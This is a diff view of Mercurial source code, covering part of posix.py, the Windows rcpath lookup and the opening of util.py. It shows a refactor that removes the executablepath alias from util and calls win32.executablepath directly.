577 def spawndetached(args):
577 def spawndetached(args):
578 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
578 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
579 args[0], args)
579 args[0], args)
580
580
581 def gethgcmd():
581 def gethgcmd():
582 return sys.argv[:1]
582 return sys.argv[:1]
583
583
584 def makedir(path, notindexed):
584 def makedir(path, notindexed):
585 os.mkdir(path)
585 os.mkdir(path)
586
586
587 def lookupreg(key, name=None, scope=None):
587 def lookupreg(key, name=None, scope=None):
588 return None
588 return None
589
589
590 def hidewindow():
590 def hidewindow():
591 """Hide current shell window.
591 """Hide current shell window.
592
592
593 Used to hide the window opened when starting asynchronous
593 Used to hide the window opened when starting asynchronous
594 child process under Windows, unneeded on other systems.
594 child process under Windows, unneeded on other systems.
595 """
595 """
596 pass
596 pass
597
597
598 class cachestat(object):
598 class cachestat(object):
599 def __init__(self, path):
599 def __init__(self, path):
600 self.stat = os.stat(path)
600 self.stat = os.stat(path)
601
601
602 def cacheable(self):
602 def cacheable(self):
603 return bool(self.stat.st_ino)
603 return bool(self.stat.st_ino)
604
604
605 __hash__ = object.__hash__
605 __hash__ = object.__hash__
606
606
607 def __eq__(self, other):
607 def __eq__(self, other):
608 try:
608 try:
609 # Only dev, ino, size, mtime and atime are likely to change. Out
609 # Only dev, ino, size, mtime and atime are likely to change. Out
610 # of these, we shouldn't compare atime but should compare the
610 # of these, we shouldn't compare atime but should compare the
611 # rest. However, one of the other fields changing indicates
611 # rest. However, one of the other fields changing indicates
612 # something fishy going on, so return False if anything but atime
612 # something fishy going on, so return False if anything but atime
613 # changes.
613 # changes.
614 return (self.stat.st_mode == other.stat.st_mode and
614 return (self.stat.st_mode == other.stat.st_mode and
615 self.stat.st_ino == other.stat.st_ino and
615 self.stat.st_ino == other.stat.st_ino and
616 self.stat.st_dev == other.stat.st_dev and
616 self.stat.st_dev == other.stat.st_dev and
617 self.stat.st_nlink == other.stat.st_nlink and
617 self.stat.st_nlink == other.stat.st_nlink and
618 self.stat.st_uid == other.stat.st_uid and
618 self.stat.st_uid == other.stat.st_uid and
619 self.stat.st_gid == other.stat.st_gid and
619 self.stat.st_gid == other.stat.st_gid and
620 self.stat.st_size == other.stat.st_size and
620 self.stat.st_size == other.stat.st_size and
621 self.stat[stat.ST_MTIME] == other.stat[stat.ST_MTIME] and
621 self.stat[stat.ST_MTIME] == other.stat[stat.ST_MTIME] and
622 self.stat[stat.ST_CTIME] == other.stat[stat.ST_CTIME])
622 self.stat[stat.ST_CTIME] == other.stat[stat.ST_CTIME])
623 except AttributeError:
623 except AttributeError:
624 return False
624 return False
625
625
626 def __ne__(self, other):
626 def __ne__(self, other):
627 return not self == other
627 return not self == other
628
628
629 def executablepath():
630 return None # available on Windows only
631
632 def statislink(st):
629 def statislink(st):
633 '''check whether a stat result is a symlink'''
630 '''check whether a stat result is a symlink'''
634 return st and stat.S_ISLNK(st.st_mode)
631 return st and stat.S_ISLNK(st.st_mode)
635
632
636 def statisexec(st):
633 def statisexec(st):
637 '''check whether a stat result is an executable file'''
634 '''check whether a stat result is an executable file'''
638 return st and (st.st_mode & 0o100 != 0)
635 return st and (st.st_mode & 0o100 != 0)
639
636
640 def poll(fds):
637 def poll(fds):
641 """block until something happens on any file descriptor
638 """block until something happens on any file descriptor
642
639
643 This is a generic helper that will check for any activity
640 This is a generic helper that will check for any activity
644 (read, write. exception) and return the list of touched files.
641 (read, write. exception) and return the list of touched files.
645
642
646 In unsupported cases, it will raise a NotImplementedError"""
643 In unsupported cases, it will raise a NotImplementedError"""
647 try:
644 try:
648 while True:
645 while True:
649 try:
646 try:
650 res = select.select(fds, fds, fds)
647 res = select.select(fds, fds, fds)
651 break
648 break
652 except select.error as inst:
649 except select.error as inst:
653 if inst.args[0] == errno.EINTR:
650 if inst.args[0] == errno.EINTR:
654 continue
651 continue
655 raise
652 raise
656 except ValueError: # out of range file descriptor
653 except ValueError: # out of range file descriptor
657 raise NotImplementedError()
654 raise NotImplementedError()
658 return sorted(list(set(sum(res, []))))
655 return sorted(list(set(sum(res, []))))
659
656
660 def readpipe(pipe):
657 def readpipe(pipe):
661 """Read all available data from a pipe."""
658 """Read all available data from a pipe."""
662 # We can't fstat() a pipe because Linux will always report 0.
659 # We can't fstat() a pipe because Linux will always report 0.
663 # So, we set the pipe to non-blocking mode and read everything
660 # So, we set the pipe to non-blocking mode and read everything
664 # that's available.
661 # that's available.
665 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
662 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
666 flags |= os.O_NONBLOCK
663 flags |= os.O_NONBLOCK
667 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
664 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
668
665
669 try:
666 try:
670 chunks = []
667 chunks = []
671 while True:
668 while True:
672 try:
669 try:
673 s = pipe.read()
670 s = pipe.read()
674 if not s:
671 if not s:
675 break
672 break
676 chunks.append(s)
673 chunks.append(s)
677 except IOError:
674 except IOError:
678 break
675 break
679
676
680 return ''.join(chunks)
677 return ''.join(chunks)
681 finally:
678 finally:
682 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
679 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
683
680
684 def bindunixsocket(sock, path):
681 def bindunixsocket(sock, path):
685 """Bind the UNIX domain socket to the specified path"""
682 """Bind the UNIX domain socket to the specified path"""
686 # use relative path instead of full path at bind() if possible, since
683 # use relative path instead of full path at bind() if possible, since
687 # AF_UNIX path has very small length limit (107 chars) on common
684 # AF_UNIX path has very small length limit (107 chars) on common
688 # platforms (see sys/un.h)
685 # platforms (see sys/un.h)
689 dirname, basename = os.path.split(path)
686 dirname, basename = os.path.split(path)
690 bakwdfd = None
687 bakwdfd = None
691 if dirname:
688 if dirname:
692 bakwdfd = os.open('.', os.O_DIRECTORY)
689 bakwdfd = os.open('.', os.O_DIRECTORY)
693 os.chdir(dirname)
690 os.chdir(dirname)
694 sock.bind(basename)
691 sock.bind(basename)
695 if bakwdfd:
692 if bakwdfd:
696 os.fchdir(bakwdfd)
693 os.fchdir(bakwdfd)
697 os.close(bakwdfd)
694 os.close(bakwdfd)
@@ -1,61 +1,61 b''
1 from __future__ import absolute_import
1 from __future__ import absolute_import
2
2
3 import os
3 import os
4
4
5 from . import (
5 from . import (
6 encoding,
6 encoding,
7 pycompat,
7 pycompat,
8 util,
8 util,
9 win32,
9 win32,
10 )
10 )
11
11
12 try:
12 try:
13 import _winreg as winreg
13 import _winreg as winreg
14 winreg.CloseKey
14 winreg.CloseKey
15 except ImportError:
15 except ImportError:
16 import winreg
16 import winreg
17
17
18 # MS-DOS 'more' is the only pager available by default on Windows.
18 # MS-DOS 'more' is the only pager available by default on Windows.
19 fallbackpager = 'more'
19 fallbackpager = 'more'
20
20
21 def systemrcpath():
21 def systemrcpath():
22 '''return default os-specific hgrc search path'''
22 '''return default os-specific hgrc search path'''
23 rcpath = []
23 rcpath = []
24 filename = util.executablepath()
24 filename = win32.executablepath()
25 # Use mercurial.ini found in directory with hg.exe
25 # Use mercurial.ini found in directory with hg.exe
26 progrc = os.path.join(os.path.dirname(filename), 'mercurial.ini')
26 progrc = os.path.join(os.path.dirname(filename), 'mercurial.ini')
27 rcpath.append(progrc)
27 rcpath.append(progrc)
28 # Use hgrc.d found in directory with hg.exe
28 # Use hgrc.d found in directory with hg.exe
29 progrcd = os.path.join(os.path.dirname(filename), 'hgrc.d')
29 progrcd = os.path.join(os.path.dirname(filename), 'hgrc.d')
30 if os.path.isdir(progrcd):
30 if os.path.isdir(progrcd):
31 for f, kind in util.listdir(progrcd):
31 for f, kind in util.listdir(progrcd):
32 if f.endswith('.rc'):
32 if f.endswith('.rc'):
33 rcpath.append(os.path.join(progrcd, f))
33 rcpath.append(os.path.join(progrcd, f))
34 # else look for a system rcpath in the registry
34 # else look for a system rcpath in the registry
35 value = util.lookupreg('SOFTWARE\\Mercurial', None,
35 value = util.lookupreg('SOFTWARE\\Mercurial', None,
36 winreg.HKEY_LOCAL_MACHINE)
36 winreg.HKEY_LOCAL_MACHINE)
37 if not isinstance(value, str) or not value:
37 if not isinstance(value, str) or not value:
38 return rcpath
38 return rcpath
39 value = util.localpath(value)
39 value = util.localpath(value)
40 for p in value.split(pycompat.ospathsep):
40 for p in value.split(pycompat.ospathsep):
41 if p.lower().endswith('mercurial.ini'):
41 if p.lower().endswith('mercurial.ini'):
42 rcpath.append(p)
42 rcpath.append(p)
43 elif os.path.isdir(p):
43 elif os.path.isdir(p):
44 for f, kind in util.listdir(p):
44 for f, kind in util.listdir(p):
45 if f.endswith('.rc'):
45 if f.endswith('.rc'):
46 rcpath.append(os.path.join(p, f))
46 rcpath.append(os.path.join(p, f))
47 return rcpath
47 return rcpath
48
48
49 def userrcpath():
49 def userrcpath():
50 '''return os-specific hgrc search path to the user dir'''
50 '''return os-specific hgrc search path to the user dir'''
51 home = os.path.expanduser('~')
51 home = os.path.expanduser('~')
52 path = [os.path.join(home, 'mercurial.ini'),
52 path = [os.path.join(home, 'mercurial.ini'),
53 os.path.join(home, '.hgrc')]
53 os.path.join(home, '.hgrc')]
54 userprofile = encoding.environ.get('USERPROFILE')
54 userprofile = encoding.environ.get('USERPROFILE')
55 if userprofile and userprofile != home:
55 if userprofile and userprofile != home:
56 path.append(os.path.join(userprofile, 'mercurial.ini'))
56 path.append(os.path.join(userprofile, 'mercurial.ini'))
57 path.append(os.path.join(userprofile, '.hgrc'))
57 path.append(os.path.join(userprofile, '.hgrc'))
58 return path
58 return path
59
59
60 def termsize(ui):
60 def termsize(ui):
61 return win32.termsize()
61 return win32.termsize()
@@ -1,4094 +1,4093 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import imp
25 import imp
26 import io
26 import io
27 import itertools
27 import itertools
28 import mmap
28 import mmap
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 node as nodemod,
48 node as nodemod,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 urllibcompat,
51 urllibcompat,
52 )
52 )
53 from .utils import (
53 from .utils import (
54 dateutil,
54 dateutil,
55 stringutil,
55 stringutil,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
74 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
76 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
77 xmlrpclib = pycompat.xmlrpclib
78
78
79 httpserver = urllibcompat.httpserver
79 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
80 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
81 urlreq = urllibcompat.urlreq
82
82
83 # workaround for win32mbcs
83 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
84 _filenamebytestr = pycompat.bytestr
85
85
86 def isatty(fp):
86 def isatty(fp):
87 try:
87 try:
88 return fp.isatty()
88 return fp.isatty()
89 except AttributeError:
89 except AttributeError:
90 return False
90 return False
91
91
92 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
94 # buffering
95 if isatty(stdout):
95 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
97
98 if pycompat.iswindows:
98 if pycompat.iswindows:
99 from . import windows as platform
99 from . import windows as platform
100 stdout = platform.winstdout(stdout)
100 stdout = platform.winstdout(stdout)
101 else:
101 else:
102 from . import posix as platform
102 from . import posix as platform
103
103
104 _ = i18n._
104 _ = i18n._
105
105
106 bindunixsocket = platform.bindunixsocket
106 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
107 cachestat = platform.cachestat
108 checkexec = platform.checkexec
108 checkexec = platform.checkexec
109 checklink = platform.checklink
109 checklink = platform.checklink
110 copymode = platform.copymode
110 copymode = platform.copymode
111 executablepath = platform.executablepath
112 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
113 explainexit = platform.explainexit
112 explainexit = platform.explainexit
114 findexe = platform.findexe
113 findexe = platform.findexe
115 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
116 getfstype = platform.getfstype
115 getfstype = platform.getfstype
117 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
118 getuser = platform.getuser
117 getuser = platform.getuser
119 getpid = os.getpid
118 getpid = os.getpid
120 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
121 groupname = platform.groupname
120 groupname = platform.groupname
122 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
123 isexec = platform.isexec
122 isexec = platform.isexec
124 isowner = platform.isowner
123 isowner = platform.isowner
125 listdir = osutil.listdir
124 listdir = osutil.listdir
126 localpath = platform.localpath
125 localpath = platform.localpath
127 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
128 makedir = platform.makedir
127 makedir = platform.makedir
129 nlinks = platform.nlinks
128 nlinks = platform.nlinks
130 normpath = platform.normpath
129 normpath = platform.normpath
131 normcase = platform.normcase
130 normcase = platform.normcase
132 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
133 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
134 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
135 oslink = platform.oslink
134 oslink = platform.oslink
136 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
137 pconvert = platform.pconvert
136 pconvert = platform.pconvert
138 poll = platform.poll
137 poll = platform.poll
139 popen = platform.popen
138 popen = platform.popen
140 posixfile = platform.posixfile
139 posixfile = platform.posixfile
141 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
142 readpipe = platform.readpipe
141 readpipe = platform.readpipe
143 rename = platform.rename
142 rename = platform.rename
144 removedirs = platform.removedirs
143 removedirs = platform.removedirs
145 samedevice = platform.samedevice
144 samedevice = platform.samedevice
146 samefile = platform.samefile
145 samefile = platform.samefile
147 samestat = platform.samestat
146 samestat = platform.samestat
148 setbinary = platform.setbinary
147 setbinary = platform.setbinary
149 setflags = platform.setflags
148 setflags = platform.setflags
150 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
151 shellquote = platform.shellquote
150 shellquote = platform.shellquote
152 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
153 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
154 split = platform.split
153 split = platform.split
155 sshargs = platform.sshargs
154 sshargs = platform.sshargs
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 statisexec = platform.statisexec
156 statisexec = platform.statisexec
158 statislink = platform.statislink
157 statislink = platform.statislink
159 testpid = platform.testpid
158 testpid = platform.testpid
160 umask = platform.umask
159 umask = platform.umask
161 unlink = platform.unlink
160 unlink = platform.unlink
162 username = platform.username
161 username = platform.username
163
162
164 try:
163 try:
165 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
166 except AttributeError:
165 except AttributeError:
167 pass
166 pass
168 try:
167 try:
169 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
170 except AttributeError:
169 except AttributeError:
171 pass
170 pass
172 try:
171 try:
173 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
174 except AttributeError:
173 except AttributeError:
175 pass
174 pass
176
175
177 # Python compatibility
176 # Python compatibility
178
177
179 _notset = object()
178 _notset = object()
180
179
181 def safehasattr(thing, attr):
180 def safehasattr(thing, attr):
182 return getattr(thing, attr, _notset) is not _notset
181 return getattr(thing, attr, _notset) is not _notset
183
182
184 def _rapply(f, xs):
183 def _rapply(f, xs):
185 if xs is None:
184 if xs is None:
186 # assume None means non-value of optional data
185 # assume None means non-value of optional data
187 return xs
186 return xs
188 if isinstance(xs, (list, set, tuple)):
187 if isinstance(xs, (list, set, tuple)):
189 return type(xs)(_rapply(f, x) for x in xs)
188 return type(xs)(_rapply(f, x) for x in xs)
190 if isinstance(xs, dict):
189 if isinstance(xs, dict):
191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 return f(xs)
191 return f(xs)
193
192
194 def rapply(f, xs):
193 def rapply(f, xs):
195 """Apply function recursively to every item preserving the data structure
194 """Apply function recursively to every item preserving the data structure
196
195
197 >>> def f(x):
196 >>> def f(x):
198 ... return 'f(%s)' % x
197 ... return 'f(%s)' % x
199 >>> rapply(f, None) is None
198 >>> rapply(f, None) is None
200 True
199 True
201 >>> rapply(f, 'a')
200 >>> rapply(f, 'a')
202 'f(a)'
201 'f(a)'
203 >>> rapply(f, {'a'}) == {'f(a)'}
202 >>> rapply(f, {'a'}) == {'f(a)'}
204 True
203 True
205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207
206
208 >>> xs = [object()]
207 >>> xs = [object()]
209 >>> rapply(pycompat.identity, xs) is xs
208 >>> rapply(pycompat.identity, xs) is xs
210 True
209 True
211 """
210 """
212 if f is pycompat.identity:
211 if f is pycompat.identity:
213 # fast path mainly for py2
212 # fast path mainly for py2
214 return xs
213 return xs
215 return _rapply(f, xs)
214 return _rapply(f, xs)
216
215
217 def bitsfrom(container):
216 def bitsfrom(container):
218 bits = 0
217 bits = 0
219 for bit in container:
218 for bit in container:
220 bits |= bit
219 bits |= bit
221 return bits
220 return bits
222
221
223 # python 2.6 still have deprecation warning enabled by default. We do not want
222 # python 2.6 still have deprecation warning enabled by default. We do not want
224 # to display anything to standard user so detect if we are running test and
223 # to display anything to standard user so detect if we are running test and
225 # only use python deprecation warning in this case.
224 # only use python deprecation warning in this case.
226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 if _dowarn:
226 if _dowarn:
228 # explicitly unfilter our warning for python 2.7
227 # explicitly unfilter our warning for python 2.7
229 #
228 #
230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 if _dowarn and pycompat.ispy3:
236 if _dowarn and pycompat.ispy3:
238 # silence warning emitted by passing user string to re.sub()
237 # silence warning emitted by passing user string to re.sub()
239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 r'mercurial')
239 r'mercurial')
241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 DeprecationWarning, r'mercurial')
241 DeprecationWarning, r'mercurial')
243
242
244 def nouideprecwarn(msg, version, stacklevel=1):
243 def nouideprecwarn(msg, version, stacklevel=1):
245 """Issue an python native deprecation warning
244 """Issue an python native deprecation warning
246
245
247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 """
247 """
249 if _dowarn:
248 if _dowarn:
250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 " update your code.)") % version
250 " update your code.)") % version
252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253
252
254 DIGESTS = {
253 DIGESTS = {
255 'md5': hashlib.md5,
254 'md5': hashlib.md5,
256 'sha1': hashlib.sha1,
255 'sha1': hashlib.sha1,
257 'sha512': hashlib.sha512,
256 'sha512': hashlib.sha512,
258 }
257 }
259 # List of digest types from strongest to weakest
258 # List of digest types from strongest to weakest
260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261
260
262 for k in DIGESTS_BY_STRENGTH:
261 for k in DIGESTS_BY_STRENGTH:
263 assert k in DIGESTS
262 assert k in DIGESTS
264
263
265 class digester(object):
264 class digester(object):
266 """helper to compute digests.
265 """helper to compute digests.
267
266
268 This helper can be used to compute one or more digests given their name.
267 This helper can be used to compute one or more digests given their name.
269
268
270 >>> d = digester([b'md5', b'sha1'])
269 >>> d = digester([b'md5', b'sha1'])
271 >>> d.update(b'foo')
270 >>> d.update(b'foo')
272 >>> [k for k in sorted(d)]
271 >>> [k for k in sorted(d)]
273 ['md5', 'sha1']
272 ['md5', 'sha1']
274 >>> d[b'md5']
273 >>> d[b'md5']
275 'acbd18db4cc2f85cedef654fccc4a4d8'
274 'acbd18db4cc2f85cedef654fccc4a4d8'
276 >>> d[b'sha1']
275 >>> d[b'sha1']
277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 >>> digester.preferred([b'md5', b'sha1'])
277 >>> digester.preferred([b'md5', b'sha1'])
279 'sha1'
278 'sha1'
280 """
279 """
281
280
282 def __init__(self, digests, s=''):
281 def __init__(self, digests, s=''):
283 self._hashes = {}
282 self._hashes = {}
284 for k in digests:
283 for k in digests:
285 if k not in DIGESTS:
284 if k not in DIGESTS:
286 raise Abort(_('unknown digest type: %s') % k)
285 raise Abort(_('unknown digest type: %s') % k)
287 self._hashes[k] = DIGESTS[k]()
286 self._hashes[k] = DIGESTS[k]()
288 if s:
287 if s:
289 self.update(s)
288 self.update(s)
290
289
291 def update(self, data):
290 def update(self, data):
292 for h in self._hashes.values():
291 for h in self._hashes.values():
293 h.update(data)
292 h.update(data)
294
293
295 def __getitem__(self, key):
294 def __getitem__(self, key):
296 if key not in DIGESTS:
295 if key not in DIGESTS:
297 raise Abort(_('unknown digest type: %s') % k)
296 raise Abort(_('unknown digest type: %s') % k)
298 return nodemod.hex(self._hashes[key].digest())
297 return nodemod.hex(self._hashes[key].digest())
299
298
300 def __iter__(self):
299 def __iter__(self):
301 return iter(self._hashes)
300 return iter(self._hashes)
302
301
303 @staticmethod
302 @staticmethod
304 def preferred(supported):
303 def preferred(supported):
305 """returns the strongest digest type in both supported and DIGESTS."""
304 """returns the strongest digest type in both supported and DIGESTS."""
306
305
307 for k in DIGESTS_BY_STRENGTH:
306 for k in DIGESTS_BY_STRENGTH:
308 if k in supported:
307 if k in supported:
309 return k
308 return k
310 return None
309 return None
311
310
312 class digestchecker(object):
311 class digestchecker(object):
313 """file handle wrapper that additionally checks content against a given
312 """file handle wrapper that additionally checks content against a given
314 size and digests.
313 size and digests.
315
314
316 d = digestchecker(fh, size, {'md5': '...'})
315 d = digestchecker(fh, size, {'md5': '...'})
317
316
318 When multiple digests are given, all of them are validated.
317 When multiple digests are given, all of them are validated.
319 """
318 """
320
319
321 def __init__(self, fh, size, digests):
320 def __init__(self, fh, size, digests):
322 self._fh = fh
321 self._fh = fh
323 self._size = size
322 self._size = size
324 self._got = 0
323 self._got = 0
325 self._digests = dict(digests)
324 self._digests = dict(digests)
326 self._digester = digester(self._digests.keys())
325 self._digester = digester(self._digests.keys())
327
326
328 def read(self, length=-1):
327 def read(self, length=-1):
329 content = self._fh.read(length)
328 content = self._fh.read(length)
330 self._digester.update(content)
329 self._digester.update(content)
331 self._got += len(content)
330 self._got += len(content)
332 return content
331 return content
333
332
334 def validate(self):
333 def validate(self):
335 if self._size != self._got:
334 if self._size != self._got:
336 raise Abort(_('size mismatch: expected %d, got %d') %
335 raise Abort(_('size mismatch: expected %d, got %d') %
337 (self._size, self._got))
336 (self._size, self._got))
338 for k, v in self._digests.items():
337 for k, v in self._digests.items():
339 if v != self._digester[k]:
338 if v != self._digester[k]:
340 # i18n: first parameter is a digest name
339 # i18n: first parameter is a digest name
341 raise Abort(_('%s mismatch: expected %s, got %s') %
340 raise Abort(_('%s mismatch: expected %s, got %s') %
342 (k, v, self._digester[k]))
341 (k, v, self._digester[k]))
343
342
344 try:
343 try:
345 buffer = buffer
344 buffer = buffer
346 except NameError:
345 except NameError:
347 def buffer(sliceable, offset=0, length=None):
346 def buffer(sliceable, offset=0, length=None):
348 if length is not None:
347 if length is not None:
349 return memoryview(sliceable)[offset:offset + length]
348 return memoryview(sliceable)[offset:offset + length]
350 return memoryview(sliceable)[offset:]
349 return memoryview(sliceable)[offset:]
351
350
352 closefds = pycompat.isposix
351 closefds = pycompat.isposix
353
352
354 _chunksize = 4096
353 _chunksize = 4096
355
354
356 class bufferedinputpipe(object):
355 class bufferedinputpipe(object):
357 """a manually buffered input pipe
356 """a manually buffered input pipe
358
357
359 Python will not let us use buffered IO and lazy reading with 'polling' at
358 Python will not let us use buffered IO and lazy reading with 'polling' at
360 the same time. We cannot probe the buffer state and select will not detect
359 the same time. We cannot probe the buffer state and select will not detect
361 that data are ready to read if they are already buffered.
360 that data are ready to read if they are already buffered.
362
361
363 This class let us work around that by implementing its own buffering
362 This class let us work around that by implementing its own buffering
364 (allowing efficient readline) while offering a way to know if the buffer is
363 (allowing efficient readline) while offering a way to know if the buffer is
365 empty from the output (allowing collaboration of the buffer with polling).
364 empty from the output (allowing collaboration of the buffer with polling).
366
365
367 This class lives in the 'util' module because it makes use of the 'os'
366 This class lives in the 'util' module because it makes use of the 'os'
368 module from the python stdlib.
367 module from the python stdlib.
369 """
368 """
370 def __new__(cls, fh):
369 def __new__(cls, fh):
371 # If we receive a fileobjectproxy, we need to use a variation of this
370 # If we receive a fileobjectproxy, we need to use a variation of this
372 # class that notifies observers about activity.
371 # class that notifies observers about activity.
373 if isinstance(fh, fileobjectproxy):
372 if isinstance(fh, fileobjectproxy):
374 cls = observedbufferedinputpipe
373 cls = observedbufferedinputpipe
375
374
376 return super(bufferedinputpipe, cls).__new__(cls)
375 return super(bufferedinputpipe, cls).__new__(cls)
377
376
378 def __init__(self, input):
377 def __init__(self, input):
379 self._input = input
378 self._input = input
380 self._buffer = []
379 self._buffer = []
381 self._eof = False
380 self._eof = False
